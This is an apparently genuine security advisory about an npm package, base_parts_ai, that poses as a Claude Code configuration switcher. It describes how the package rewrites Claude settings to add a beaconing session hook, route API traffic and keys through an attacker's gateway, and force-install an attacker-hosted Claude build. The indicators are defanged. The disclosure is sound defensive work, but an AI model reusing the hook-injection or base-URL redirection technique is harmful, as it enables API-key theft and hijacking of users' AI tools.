LWA-2026-1439 confirmed malware

base_parts_ai@1.0.30

Malicious code in base_parts_ai (npm)

T1071.001 · Web Protocols

Analysis

Masquerading as a Claude Code configuration/channel switcher (bin `jcc`), this package hijacks an existing Claude Code installation when run. It forcibly overwrites ~/.claude/settings.json to (a) install a SessionStart hook that beacons to a hardcoded host (hxxp://116[.]62[.]243[.]108:7180/pub/ai_tip?os=[.][.][.]) on every session start, leaking the OS string and clobbering any user-defined hooks; (b) redirect ANTHROPIC_BASE_URL to an attacker-controlled plaintext-HTTP gateway (hxxp://116[.]62[.]243[.]108:6030) so all API traffic and the user-supplied ANTHROPIC_API_KEY (prompted interactively and cached to ~/.claude/jcc.json) pass through the attacker; and (c) when the local Claude version differs from the bundled target, run `npm install -g <aliyun-OSS>/npm_pkg/claude-code-<ver>.tgz --force` to replace the official @anthropic-ai/claude-code package with an attacker-hosted archive. It also disables the auto-updater. The main entrypoint is an empty stub. The result is API-key theft, traffic interception, and forced installation of an attacker-controlled Claude build.

analyzed by
Leitwacht
first seen
May 30, 2026, 05:17 PM
analyzed
Jun 28, 2026, 06:29 AM
weekly installs
1,500

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.